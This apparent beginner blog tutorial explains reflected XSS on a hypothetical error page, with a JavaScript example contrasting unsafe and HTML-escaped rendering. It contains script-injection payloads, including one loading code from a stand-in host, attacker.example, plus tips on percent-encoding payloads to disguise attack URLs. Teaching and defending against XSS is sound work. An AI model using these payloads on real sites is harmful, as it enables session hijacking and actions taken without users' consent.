XSS, or Cross-Site Scripting, is a class of web application vulnerability that lets an attacker target other users of the application in order to access their data and perform unauthorized actions on their behalf. (Note that XSS alone does not give you control of the web application's server; it attacks the application's users.)

Simply put, with XSS the attacker injects client-side script into the page the website sends to a victim; the victim's browser renders that page and, in most cases, executes the script.

XSS can be used for many different purposes, but one of the most common is capturing the session token of an authenticated user. By hijacking the session, the attacker gains access to all the data and functionality that the user is authorized for. (If the session cookie carries the HttpOnly flag, injected script cannot read it through document.cookie, but the script can still send requests as the user from inside the page.)

As an example, www.mdtest.com has a page that shows an error message taken from an input parameter, like www.mdtest.com/err?msg="page not found" .

If you look at the page source, you will see that the message from the URL appears in the HTML exactly as it was given, with no encoding applied.

Thats it!

By changing the URL to www.mdtest.com/err?msg=<script>alert('Hello dear XSS victim');</script> and loading the page, you will see an alert box from the website saying just that: the script has been injected into the page source and run by your browser.

It's that simple; in fact it is one of the simplest demonstrations of XSS.

There are two problems with it.

First, this demonstration does nothing except prove that the problem exists. Second, it is obvious that the URL is not normal!

For the second problem, you can put your script in a file hosted on a server you control so the injected tag only has to load it, and you can percent-encode the parameter value so the payload is not readable at a glance. Only the value after msg= should be encoded; encoding the / and ? of the URL itself would break it. The encoded sample URL is: www.mdtest.com/err?msg=%3Cscript%3Ealert('%20Hello%20dear%20XSS%20victim')%3B%3C%2Fscript%3E . Keep in mind that this only obscures the payload: the server decodes the parameter before using it, and anyone who decodes the URL sees the script.

I do not want to go into encoding/decoding here; see this tool as an example: http://meyerweb.com/eric/tools/dencoder/

For the first problem, there are dozens of ways to write a more advanced script that fetches the data you want, and you can combine XSS with other web application vulnerabilities for much better results.
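To make the reflection above and the encoding trick concrete, here is an added example (my own code, not from the original post or from www.mdtest.com): the vulnerable err page rendered the way the post describes, the same page with the parameter HTML-escaped, and the attack URL built with only the parameter value percent-encoded. www.mdtest.com and attacker.example are hypothetical hosts, and both payloads are constructed samples. It runs under Node.js.

```javascript
// Added example (not from the original post): a reflected-XSS "err" page in
// two versions, the vulnerable one the post describes and a hardened one.
// www.mdtest.com and attacker.example are hypothetical hosts.

// Vulnerable version: the untrusted query parameter is concatenated straight
// into the HTML, so any markup in it becomes part of the page.
function renderErrorPageUnsafe(msg) {
  return `<html><body><h1>Error</h1><p>${msg}</p></body></html>`;
}

// HTML-escape the five characters that can break out of text content or an
// attribute value. This is the standard fix for reflection into HTML text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened version: same page, but the parameter is escaped before insertion.
function renderErrorPageSafe(msg) {
  return `<html><body><h1>Error</h1><p>${escapeHtml(msg)}</p></body></html>`;
}

// Build the attack URL the way an attacker would: percent-encode only the
// parameter value, never the "/" and "?" of the URL itself.
function buildAttackUrl(payload) {
  return 'http://www.mdtest.com/err?msg=' + encodeURIComponent(payload);
}

// What the server sees: URL parsing undoes the percent-encoding, so the
// obscured URL delivers exactly the same payload as the readable one.
function msgFromUrl(url) {
  return new URL(url).searchParams.get('msg');
}

// Does the rendered HTML contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The post's proof-of-concept payload, and one that loads a script hosted on
// the attacker's own server (constructed samples; attacker.example is hypothetical).
const ALERT_PAYLOAD = "<script>alert(' Hello dear XSS victim');</script>";
const HOSTED_PAYLOAD = '<script src="http://attacker.example/x.js"></script>';

// Runs the end-to-end demo for one payload: encode, decode, render both ways.
function demo(payload) {
  const url = buildAttackUrl(payload);
  const msg = msgFromUrl(url);
  return {
    url,
    decodedMatchesPayload: msg === payload,
    unsafeExecutes: containsScriptTag(renderErrorPageUnsafe(msg)),
    safeExecutes: containsScriptTag(renderErrorPageSafe(msg)),
    safeHtml: renderErrorPageSafe(msg),
  };
}

for (const payload of [ALERT_PAYLOAD, HOSTED_PAYLOAD]) {
  console.log(demo(payload));
}
```

The unsafe render puts a real `<script>` tag into the page for both payloads, while the escaped render turns it into harmless `&lt;script&gt;` text; the percent-encoded URL decodes back to the identical payload, which is why encoding hides nothing from the server or from anyone who decodes the link.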

And always keep in mind that these tutorials are just for beginners in computer security.

A useful book for professionals: http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543
